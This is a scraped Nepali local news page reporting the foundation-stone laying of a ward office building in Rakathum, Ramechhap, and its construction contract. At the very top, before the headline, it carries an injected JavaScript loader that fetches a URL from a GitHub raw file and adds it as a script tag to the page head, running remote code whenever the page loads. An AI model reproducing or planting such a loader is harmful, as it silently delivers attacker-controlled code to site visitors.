;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); राकाथुममा वडा कार्यालय भवन शिलन्यास् – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • राकाथुममा वडा कार्यालय भवन शिलन्यास्
देश/प्रदेश

राकाथुममा वडा कार्यालय भवन शिलन्यास्

पुष २४,

रामेछाप । रामेछापको खाँडादेवी गाउपालिका वडा नं १ राकाथुमको वडा कार्यालय भवनको शिलन्यास् गरिएको छ ।

शुक्रबार पालिकाका प्रमुख प्रेम बहादुर तामाङ्ले एक कार्यक्रमका बिच पक्की चार कोठे भवनको शिलन्यास् गरेका हुन् । भवन शिलन्यास् गर्दै प्रमुख तामाङ्ले निर्माणको काम भनेकै समयमा सम्पन्न गर्न र गुणस्तरीय काम गर्न सुझाव निर्देशन दिए ।

वडा कार्यालय भवन आगामी वैशाख महिनाभित्र निर्माण सक्ने गरी प्रथमा सुवेदी सुलोचना जेभीले निर्माणको जिम्मा पाएको छ । ७९ लाख ८० हजार रुपैयाँमा ठेक्का सम्झौता पाएको हो ।

फेसबुक प्रतिक्रियाहरु